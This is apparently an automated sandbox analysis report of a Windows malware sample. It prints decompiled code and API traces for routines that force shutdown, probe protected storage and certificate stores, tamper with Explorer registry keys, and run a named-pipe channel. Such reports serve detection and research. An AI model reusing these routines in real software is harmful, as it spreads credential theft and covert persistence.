      • Part of subcall function 0040F0FC: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 0040F147
      • Part of subcall function 0040F0FC: GetLastError.KERNEL32 ref: 0040F151
      • Part of subcall function 0040F0FC: FindCloseChangeNotification.KERNELBASE(?), ref: 0040F160
    • ExitWindowsEx.USER32(00000001,00000000), ref: 0040A185
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$AdjustChangeCloseErrorExitFindLastLookupNotificationOpenPrivilegePrivilegesProcessValueWindows
    • String ID: SeShutdownPrivilege
    • API String ID: 1103692467-3733053543
    • Opcode ID: c0b849bad9631b9bd26cba802f70e6b01ca5c5d992566862274416b5fe327dcf
    • Instruction ID: 832338d5d24ef919c078582c1ce4f177575fe7a2c8eb67e3512c5ef70086f2ee
    • Opcode Fuzzy Hash: c0b849bad9631b9bd26cba802f70e6b01ca5c5d992566862274416b5fe327dcf
    • Instruction Fuzzy Hash: EEC08C90796341BAF2103AB20F0BB4F68884B60B94F18CC3AB042E24D2C87CC664B638
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: 0@$?Q@
    • API String ID: 0-944785670
    • Opcode ID: f7be5a50371d56287a4359eb081eb66690dd23ddbf7abc00c7367f92b3049a4e
    • Instruction ID: d0c4063beb1af011b0062ee165e80add20f31a715f3029080c28b2cedc6f16b3
    • Opcode Fuzzy Hash: f7be5a50371d56287a4359eb081eb66690dd23ddbf7abc00c7367f92b3049a4e
    • Instruction Fuzzy Hash: 0AD1CE6048E3C24FD71387B449699917FB0AE1312871E96EFC5D6CF4A3D29D889BC722
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00405171(intOrPtr _a4, short* _a8, intOrPtr _a12, intOrPtr* _a16) {
    				intOrPtr _t10;
    				intOrPtr _t13;
    				void* _t15;
    				intOrPtr _t16;
    				short* _t17;
    				void* _t18;
    				void* _t19;
    
    				_t17 = _a8;
    				_t16 = _a4;
    				_t18 = _t16 -  *0x412a7c; // 0x70950000
    				if(_t18 == 0) {
    					L2:
    					if(_t17 == 0) {
    						L4:
    						_t13 = 0;
    						L5:
    						if(_t17 == 0) {
    							L8:
    							_t9 = 0;
    							L9:
    							_t10 = E00406B6A(_t13, _t15, _t16, _t9, _a12, _t13);
    							if(_t10 == 0) {
    								return  *0x412b1c(_t16, _t17, _a12, _a16);
    							}
    							 *_a16 = _t10;
    							return 0;
    						}
    						_t9 =  *((intOrPtr*)(_t17 + 4));
    						if( *((intOrPtr*)(_t17 + 4)) == 0 ||  *_t17 <= 0) {
    							goto L8;
    						} else {
    							goto L9;
    						}
    					}
    					_t13 =  *((intOrPtr*)(_t17 + 4));
    					goto L5;
    				}
    				_t19 = _t16 -  *0x412bb0; // 0x75300000
    				if(_t19 != 0) {
    					goto L4;
    				}
    				goto L2;
    			}











    APIs
    • LdrGetProcedureAddress.NTDLL(?,?,?,?), ref: 004051CA
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProcedure
    • String ID:
    • API String ID: 3653107232-0
    • Opcode ID: 762b6ef818220d900234958e823f73775c6e842ec288e74e3dc43633983134db
    • Instruction ID: 359417492a32612044e996936296b7745bacbc4c16446bc33c143b5d67a09c24
    • Opcode Fuzzy Hash: 762b6ef818220d900234958e823f73775c6e842ec288e74e3dc43633983134db
    • Instruction Fuzzy Hash: 97016232A00515ABDB228F55DD00ABB776AEF85750B05443AFC01FB280D778BC109FA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D054() {
    				long _t7;
    				signed int _t8;
    				intOrPtr _t9;
    				void* _t12;
    				void* _t14;
    
    				_t12 = _t14 - 0x78;
    				_t7 = GetTimeZoneInformation(_t12 - 0x34);
    				if(_t7 != 1) {
    					if(_t7 != 2) {
    						_t8 = 0;
    					} else {
    						_t9 =  *((intOrPtr*)(_t12 + 0x74));
    						goto L4;
    					}
    				} else {
    					_t9 =  *((intOrPtr*)(_t12 + 0x20));
    					L4:
    					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
    				}
    				return _t8;
    			}









    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 0040D063
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: 504c8aa912d926c400be450e2d8436faffa15de0af32c9c8faebafa35f6b28b4
    • Instruction ID: da2e8eef0cf4ffaab41400f214a53638155768fa17a909a3a52e1985826177b8
    • Opcode Fuzzy Hash: 504c8aa912d926c400be450e2d8436faffa15de0af32c9c8faebafa35f6b28b4
    • Instruction Fuzzy Hash: CBE08630E44008CBDB24DFE4DE4599E77FAA705308F300536E946F62C0E678D94BCA46
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E0040DFED(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				unsigned int _t67;
    				signed int _t68;
    				intOrPtr _t71;
    				void* _t79;
    				signed int _t81;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				signed int _t98;
    				signed int _t99;
    				signed int _t100;
    				signed int _t101;
    				signed int _t102;
    				unsigned int _t103;
    				signed int _t104;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t115;
    				signed int _t116;
    				intOrPtr* _t119;
    				unsigned int _t125;
    				signed int _t126;
    				signed int _t128;
    
    				_t71 = _a4;
    				_t98 = 0;
    				_t99 = 0;
    				_v16 = 0;
    				_v20 = 1;
    				L1:
    				while(1) {
    					if(_t99 <= 0) {
    						_t103 =  *(_t98 + _t71);
    						_t98 = _t98 + 4;
    						_t99 = 0x1f;
    						_t104 = _t103 >> 0x1f;
    					} else {
    						_t99 = _t99 - 1;
    						_t104 = _t67 >> _t99 & 0x00000001;
    					}
    					if(_t104 != 0) {
    						_v16 = _v16 + 1;
    						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
    						_t98 = _t98 + 1;
    						L6:
    						_t71 = _a4;
    						continue;
    					}
    					_v12 = 1;
    					do {
    						if(_t99 <= 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t100 = 0x1f;
    							_t106 = _t67 >> 0x1f;
    						} else {
    							_t100 = _t99 - 1;
    							_t106 = _t67 >> _t100 & 0x00000001;
    						}
    						_v12 = _t106 + _v12 * 2;
    						if(_t100 <= 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t108 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t100 - 1;
    							_t108 = _t67 >> _t99 & 0x00000001;
    						}
    					} while (_t108 == 0);
    					_t111 = _v12;
    					if(_t111 == 2) {
    						_t81 = _v20;
    						L19:
    						_v12 = _t81;
    						if(_t99 <= 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t101 = 0x1f;
    							_v8 = _t67 >> 0x1f;
    						} else {
    							_t101 = _t99 - 1;
    							_v8 = _t67 >> _t101 & 0x00000001;
    						}
    						if(_t101 <= 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t115 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t101 - 1;
    							_t115 = _t67 >> _t99 & 0x00000001;
    						}
    						_t116 = _t115 + _v8 * 2;
    						_v8 = _t116;
    						if(_t116 == 0) {
    							_v8 = 1;
    							do {
    								if(_t99 <= 0) {
    									_t125 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t102 = 0x1f;
    									_t126 = _t125 >> 0x1f;
    								} else {
    									_t102 = _t99 - 1;
    									_t126 = _t67 >> _t102 & 0x00000001;
    								}
    								_v8 = _t126 + _v8 * 2;
    								if(_t102 <= 0) {
    									_t67 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t99 = 0x1f;
    									_t128 = _t67 >> 0x1f;
    								} else {
    									_t99 = _t102 - 1;
    									_t128 = _t67 >> _t99 & 0x00000001;
    								}
    							} while (_t128 == 0);
    							_v8 = _v8 + 2;
    						}
    						asm("sbb ecx, ecx");
    						_v8 = _v8 +  ~0xd00;
    						_t87 = _v16;
    						_t119 = _t87 - _v12 + _a12;
    						_v16 = _t119;
    						 *((char*)(_t87 + _a12)) =  *_t119;
    						_t88 = _t87 + 1;
    						_v16 = _v16 + 1;
    						do {
    							 *((char*)(_t88 + _a12)) =  *_v16;
    							_t88 = _t88 + 1;
    							_v16 = _v16 + 1;
    							_t57 =  &_v8;
    							 *_t57 = _v8 - 1;
    						} while ( *_t57 != 0);
    						_v16 = _t88;
    						goto L6;
    					}
    					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
    					_t98 = _t98 + 1;
    					if(_t79 != 0xffffffff) {
    						_t81 = _t79 + 1;
    						_v20 = _t81;
    						goto L19;
    					}
    					_t68 = _a16;
    					 *_t68 = _v16;
    					return _t68 & 0xffffff00 | _t98 == _a8;
    				}
    			}































    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
    • Instruction ID: 5cf0b869c3ece1dc4037ef0b1c63a914850ce8540bc613fc05f240a9535e6fc0
    • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
    • Instruction Fuzzy Hash: 87510132E00A359BDB148E99C4506ADF3B1EF85324F1A46BACD16BF3C1C675AD51CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040DD80() {
    				signed int _t18;
    				signed int _t38;
    				signed int _t55;
    				signed int _t56;
    				signed int* _t59;
    				signed int _t60;
    				signed int* _t61;
    
    				_t18 =  *0x413e58; // 0x1cc
    				if(_t18 >= 0x270) {
    					_t60 = 0;
    					do {
    						_t55 = _t60 << 2;
    						_t1 = _t55 + 0x413494; // 0xaee6a520
    						_t2 = 0x413490 + _t55; // 0x1e90d0c9
    						_t3 = 0x413490 + _t55; // 0x1e90d0c9
    						_t6 = _t55 + 0x413ac4; // 0x64e262b6
    						_t60 = _t60 + 1;
    						 *(0x413490 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x4124a0 + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
    					} while (_t60 < 0xe3);
    					if(_t60 < 0x26f) {
    						_t59 =  &(0x413490[_t60]);
    						do {
    							_t10 =  &(_t59[1]); // 0x4
    							_t61 = _t10;
    							 *_t59 =  *(0x4124a0 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
    							_t59 = _t61;
    						} while (_t59 < 0x413e4c);
    					}
    					_t56 =  *0x413e4c; // 0xd5cb5150
    					_t38 =  *0x413490; // 0x1e90d0c9
    					 *0x413e4c = ((_t38 ^ _t56) & 0x7fffffff ^ _t56) >> 0x00000001 ^  *(0x4124a0 + (((_t38 ^ _t56) & 0x7fffffff ^ _t56) & 0x00000001) * 4) ^  *0x413ac0;
    					_t18 = 0;
    				}
    				 *0x413e58 = _t18 + 1;
    				return (0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fe70b278222034761fc44da7ab056650558806c13e12973836ac921ab11914e6
    • Instruction ID: b0fb9c7d04ef6a132db29f26449a2553c388438f4a3a5cb84db962ef4e52fa9d
    • Opcode Fuzzy Hash: fe70b278222034761fc44da7ab056650558806c13e12973836ac921ab11914e6
    • Instruction Fuzzy Hash: 2A219F363205008BD748CF39DC5979633E2FB8C31D719857DD119CB290DA35E612CB48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E00404E42(void* __ecx) {
    				intOrPtr _v1064;
    				intOrPtr _v1084;
    				void* _v1088;
    				void* _v1096;
    				short _v1588;
    				void* _v1592;
    				signed int _v1596;
    				char _v1600;
    				signed int _v1604;
    				char _v1608;
    				intOrPtr _v1612;
    				int _t51;
    				void* _t56;
    				intOrPtr _t59;
    				void* _t64;
    				void* _t75;
    				void* _t79;
    				void* _t85;
    				void* _t91;
    				WCHAR* _t97;
    				void* _t98;
    				char* _t100;
    				char* _t101;
    
    				_t91 = __ecx;
    				 *0x4126e8 = 0;
    				E00409725(0);
    				E00410678();
    				L00403961();
    				E004077B4();
    				 *0x413e64 = 0;
    				_v1600 = 1;
    				lstrcpyW( &_v1588,  *0x4129e8);
    				_t97 = L"rsldps";
    				lstrcatW( &_v1588, _t97);
    				_v1592 = CreateMutexW(0x413468, 1, _t97);
    				if(GetLastError() == 0) {
    					_t100 = "09ck_=ldfuihpfre";
    					_t56 = E00407945(_t41, _t91, 1, _t100);
    					_t109 = _t56 - 4;
    					if(_t56 != 4) {
    						E00404803();
    						_push( &_v1600);
    						_push(_t100);
    						_push(1);
    						_t85 = 4;
    						E004079B5(_t85, _t109);
    					}
    					_t101 = "3709128dk0023444";
    					_v1604 = 0;
    					if(E00407945( &_v1604, _t91, 1, _t101) != 4) {
    						_v1596 = 0;
    					} else {
    						_v1596 =  *_v1604;
    					}
    					_t59 = E00403DAD(_t91, 0, L"MY", 0, _v1596);
    					_v1612 = _t59;
    					_t111 = _t59 - _v1608;
    					if(_t59 != _v1608) {
    						_push( &_v1600);
    						_push(_t101);
    						_push(1);
    						_t79 = 4;
    						E004079B5(_t79, _t111);
    					}
    					E0040CF40(_v1604);
    					_t102 = "!!!0-0=9-0=23434";
    					_v1608 = 0;
    					if(E00407945( &_v1608, _t91, 1, "!!!0-0=9-0=23434") != 0) {
    						_t75 = E004075EF(_t91, _v1604, _t62);
    						_t113 = _t75;
    						if(_t75 != 0) {
    							E00407A2C(_t113, 1, _t102);
    						}
    						E0040CF40(_v1604);
    					}
    					_t103 = "~23324m\'m434dKkl";
    					_t64 = E00407945(0, _t91, 1, "~23324m\'m434dKkl");
    					_t114 = _t64 - 4;
    					if(_t64 == 4) {
    						 *0x412b34(0x10000, 0, 0, E00403EFA);
    						E00407A2C(_t114, 1, _t103);
    					}
    					_t104 = "3208()_*09303333";
    					_v1604 = 0;
    					if(E00407945( &_v1604, _t91, 1, "3208()_*09303333") == 4) {
    						_t68 = _v1604;
    						_t24 =  *_v1604 == 0;
    						E00404BC8((_t68 & 0xffffff00 |  *_v1604 == 0x00000000) & 0x000000ff);
    						E00407A2C(_t24, 1, _t104);
    					}
    					E0040CF40(_v1604);
    				}
    				if(_v1592 != 0) {
    					CloseHandle(_v1592);
    				}
    				 *0x412e50 = 0;
    				 *0x412e4c = 0;
    				 *0x412dd0(0x412e34);
    				 *0x412e10 = 0;
    				 *0x412e0c = 0;
    				 *0x412e14 = 0;
    				 *0x412e18 = 0;
    				 *0x412dd0(0x412e1c);
    				 *0x412dd0(0x412708);
    				 *0x412728 = 0;
    				E0040541D();
    				 *0x41272c = 0;
    				 *0x412724 = 0;
    				 *0x412dd0(0x4126ec);
    				_v1084 = 0x428;
    				_t98 = CreateToolhelp32Snapshot(8,  *0x412ba0);
    				if(_t98 != 0xffffffff) {
    					_t51 = Module32FirstW(_t98,  &_v1088);
    					while(_t51 != 0) {
    						E00406A74(0x412448, _t91, 0, _v1064);
    						_t51 = Module32NextW(_t98,  &_v1096);
    					}
    				}
    				return 1;
    			}

    APIs
      • Part of subcall function 00409725: CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 00409858
      • Part of subcall function 00410678: PathCombineW.SHLWAPI(?,0246F5A8,?), ref: 0041069F
      • Part of subcall function 00410678: PathCombineW.SHLWAPI(00413260,00413260,?), ref: 004106AE
    • lstrcpyW.KERNEL32(?), ref: 00404E87
    • lstrcatW.KERNEL32(?,rsldps), ref: 00404E98
    • CreateMutexW.KERNEL32(Function_00013468,00000001,rsldps), ref: 00404EA5
    • GetLastError.KERNEL32 ref: 00404EAF
    • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,00403EFA), ref: 00404F91
    • CloseHandle.KERNEL32(?), ref: 00404FE3
    • RtlInitializeCriticalSection.NTDLL(00412E34), ref: 00404FFA
    • RtlInitializeCriticalSection.NTDLL(00412E1C), ref: 0040501D
    • RtlInitializeCriticalSection.NTDLL(00412708), ref: 00405028
    • RtlInitializeCriticalSection.NTDLL(004126EC), ref: 0040504C
    • CreateToolhelp32Snapshot.KERNEL32(00000008), ref: 00405065
    • Module32FirstW.KERNEL32(00000000,?), ref: 0040507B
    • Module32NextW.KERNEL32(00000000,?), ref: 0040509D
      • Part of subcall function 00404803: LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00404819
      • Part of subcall function 00404803: GetProcAddress.KERNELBASE(00000000), ref: 00404820
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalInitializeSection$CombineCreateModule32Path$AddressBuffCertCharCloseEnumErrorFirstHandleLastLibraryLoadLowerMutexNextProcSnapshotStoreSystemToolhelp32lstrcatlstrcpy
    • String ID: !!!0-0=9-0=23434$09ck_=ldfuihpfre$3208()_*09303333$3709128dk0023444$rsldps$~23324m'm434dKkl
    • API String ID: 2000831771-3763064653
    • Opcode ID: 905d276a5dd3761ca79422ae862de307bd6c11e5db6e1ec7ca2835049f68851c
    • Instruction ID: 4273ece126efa07964b219cf53797b4160e737d776b16559c152c9fa35d47a19
    • Opcode Fuzzy Hash: 905d276a5dd3761ca79422ae862de307bd6c11e5db6e1ec7ca2835049f68851c
    • Instruction Fuzzy Hash: F651A1B0908301ABD310EF66DD4599F7AA8EF85355F00483BF544E21E1D7B899648BAE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00407A73() {
    				void** _t94;
    				signed int _t99;
    				long _t113;
    				long _t121;
    				long _t130;
    				short* _t136;
    				int _t138;
    				char* _t139;
    				intOrPtr* _t143;
    				void* _t145;
    				void* _t156;
    				int _t163;
    				int _t167;
    				void* _t170;
    				void* _t172;
    
    				_t170 = _t172 - 0x6c;
    				_t156 =  *( *(_t170 + 0x7c));
    				_t163 = 0;
    				if(_t156 <= 0x10) {
    					L47:
    					return _t163;
    				}
    				 *(_t170 + 0x68) = 0;
    				if((_t156 - 0x00000010 & 0xfffffffe) <= 0) {
    					goto L47;
    				} else {
    					_t136 =  *( *(_t170 + 0x78));
    					_t143 = _t136;
    					while( *_t143 != _t163) {
    						 *(_t170 + 0x68) =  *(_t170 + 0x68) + 1;
    						_t143 = _t143 + 2;
    						if( *(_t170 + 0x68) < _t156 - 0x10 >> 1) {
    							continue;
    						} else {
    							L46:
    							goto L47;
    						}
    					}
    					_t145 = E0040D3D8(_t136) + _t80;
    					_t150 = _t145 + _t136 + 2;
    					 *(_t170 + 0x64) = _t145 + _t136 + 2 + 0x10;
    					 *(_t170 + 0x60) = _t136 -  *(_t170 + 0x64) + _t156;
    					if(_t156 - _t145 + 2 < 0x10) {
    						goto L46;
    					}
    					E00407646(_t170 - 4, _t150);
    					if( *_t136 != 0x2a ||  *((intOrPtr*)(_t136 + 2)) != 0) {
    						E0040DE73(_t170 + 0x4c, _t136, E0040D3D8(_t136) + _t86);
    						E00407646(_t170 - 0x54, _t170 + 0x4c);
    						PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
    						_t138 =  *(_t170 + 0x74);
    						_t94 = _t170 + 0x68;
    						if(_t138 != 0xf) {
    							_t99 = RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, (0 | _t138 == 0x00000011) + 1, _t94);
    						} else {
    							_t99 = RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t94, 0);
    						}
    						asm("sbb esi, esi");
    						_t163 =  ~_t99 + 1;
    						if(_t163 == 0) {
    							goto L46;
    						} else {
    							if(_t138 != 0xf) {
    								if(_t138 != 0x11) {
    									if(_t138 == 0x10) {
    										_t163 = 0;
    										if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, 0, _t170 + 0x74) == 0) {
    											_t104 =  *(_t170 + 0x74);
    											if( *(_t170 + 0x74) != 0) {
    												_t139 = E0040CF2D(_t104);
    												if(_t139 != 0) {
    													if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, _t139, _t170 + 0x74) != 0) {
    														E0040CF40(_t139);
    													} else {
    														_t167 =  *(_t170 + 0x78);
    														E0040CF40( *_t167);
    														 *_t167 = _t139;
    														_t163 =  *(_t170 + 0x74);
    														 *( *(_t170 + 0x7c)) = _t163;
    													}
    												}
    											}
    										}
    									}
    									L44:
    									_push( *(_t170 + 0x68));
    									goto L45;
    								}
    								_t113 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
    								L36:
    								asm("sbb esi, esi");
    								_t163 =  ~_t113 + 1;
    								goto L44;
    							}
    							_t113 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
    							goto L36;
    						}
    					} else {
    						if(RegOpenKeyExW(0x80000001, L"software\\microsoft\\windows\\currentversion\\explorer", 0, 8, _t170 + 0x5c) != 0) {
    							goto L46;
    						} else {
    							 *(_t170 + 0x78) = 0;
    							while(1) {
    								 *(_t170 + 0x7c) = 0x28;
    								_t121 = RegEnumKeyExW( *(_t170 + 0x5c),  *(_t170 + 0x78), _t170 - 0x54, _t170 + 0x7c, 0, 0, 0, _t170 + 0x54);
    								if(_t121 == 0xea) {
    									goto L26;
    								}
    								if(_t121 != 0) {
    									_push( *(_t170 + 0x5c));
    									L45:
    									RegCloseKey();
    									goto L46;
    								}
    								if( *(_t170 + 0x7c) == 0x26 &&  *(_t170 - 0x54) == 0x7b &&  *((short*)(_t170 - 0xa)) == 0x7d) {
    									PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
    									if( *(_t170 + 0x74) != 0x11) {
    										if( *(_t170 + 0x74) != 0xf) {
    											 *(_t170 + 0x68) = 0;
    											L25:
    											RegCloseKey( *(_t170 + 0x68));
    											goto L26;
    										}
    										if(RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t170 + 0x68, 0) == 0) {
    											_t130 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
    											L22:
    											if(_t130 == 0) {
    												_t163 = _t163 + 1;
    											}
    										}
    										goto L25;
    									}
    									if(RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, 2, _t170 + 0x68) != 0) {
    										goto L25;
    									} else {
    										_t130 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
    										goto L22;
    									}
    								}
    								L26:
    								 *(_t170 + 0x78) =  *(_t170 + 0x78) + 1;
    							}
    						}
    					}
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,software\microsoft\windows\currentversion\explorer,00000000,00000008,?), ref: 00407B20
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00407B4D
    • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?), ref: 00407B96
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000002,?), ref: 00407BB1
    • RegDeleteValueW.ADVAPI32(?,?), ref: 00407BC2
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00407BE3
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00407BFD
      • Part of subcall function 0040DE73: CryptAcquireContextW.ADVAPI32(0040FCF8,00000000,00000000,00000001,F0000040,?,0040FCF8,00000000,?,-0000001C,00000000,?,?,?), ref: 0040DE8C
      • Part of subcall function 0040DE73: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 0040DEA4
      • Part of subcall function 0040DE73: CryptHashData.ADVAPI32(?,00000010), ref: 0040DEBF
      • Part of subcall function 0040DE73: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0040DED6
      • Part of subcall function 0040DE73: CryptDestroyHash.ADVAPI32(?), ref: 0040DEED
      • Part of subcall function 0040DE73: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040DEF7
    • RegCloseKey.ADVAPI32(?), ref: 00407C10
    • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?,?,?,00000000), ref: 00407C55
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000,?,00000000), ref: 00407C7A
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,00000000), ref: 00407C9A
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?,?,00000000), ref: 00407CC4
    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00407CD8
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00407CFC
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00407D26
    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00407D4F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CryptValue$Hash$CreateOpen$CloseCombineContextDeletePathQuery$AcquireDataDestroyEnumFreeHeapParamRelease
    • String ID: *$software\microsoft\windows\currentversion\explorer
    • API String ID: 1179558880-1506458415
    • Opcode ID: 99acb78b41caa17f00ed95c7cde797da357d0b7378249209d7018b839fdfa87c
    • Instruction ID: aa9b4c1d78fd442f01d3b3395a36ca9e650cd7f276a31cdce7d90ea6429e5710
    • Opcode Fuzzy Hash: 99acb78b41caa17f00ed95c7cde797da357d0b7378249209d7018b839fdfa87c
    • Instruction Fuzzy Hash: A6918E71904208AFEB20DF64CD84DEE7BB9EF85740B20413AF912E61A1D674AD45CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00408F8D(void _a4) {
    				long _v8;
    				void _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				void _t59;
    				void* _t71;
    				long _t75;
    				void** _t81;
    
    				_t81 = _a4;
    				_v20 = CreateMutexW(0x413468, 0, _t81[4]);
    				SetEvent(_t81[2]);
    				DisconnectNamedPipe( *_t81);
    				if(WaitForSingleObject(_t81[1], 0) != 0) {
    					_t75 = 4;
    					do {
    						if(ConnectNamedPipe( *_t81, 0) == 1) {
    							_v12 = 0;
    							_v8 = 0;
    							_v16 = 0;
    							_a4 = 0;
    							if(ReadFile( *_t81,  &_v12, _t75,  &_v8, 0) != 0 && _v8 == _t75 && ReadFile( *_t81,  &_a4, _t75,  &_v8, 0) != 0 && _v8 == _t75) {
    								_t59 = _a4;
    								if(_t59 > 0xa00000) {
    									_t59 = 0;
    									_a4 = 0;
    								}
    								if(_t59 <= 0) {
    									L13:
    									_v12 = _t81[3]( &_a4);
    									WriteFile( *_t81,  &_v12, _t75,  &_v8, 0);
    									if(_a4 > 0xa00000) {
    										_a4 = 0;
    									}
    									WriteFile( *_t81,  &_a4, _t75,  &_v8, 0);
    									if(_a4 != 0) {
    										WriteFile( *_t81, _v16, _a4,  &_v8, 0);
    									}
    									FlushFileBuffers( *_t81);
    								} else {
    									_t71 = E0040CF2D(_t59);
    									_v16 = _t71;
    									if(_t71 != 0 && ReadFile( *_t81, _t71, _a4,  &_v8, 0) != 0 && _v8 == _a4) {
    										goto L13;
    									}
    								}
    							}
    							E0040CF40(_v16);
    							DisconnectNamedPipe( *_t81);
    						}
    					} while (WaitForSingleObject(_t81[1], 0) != 0);
    				}
    				CloseHandle(_v20);
    				SetEvent(_t81[2]);
    				_push(0);
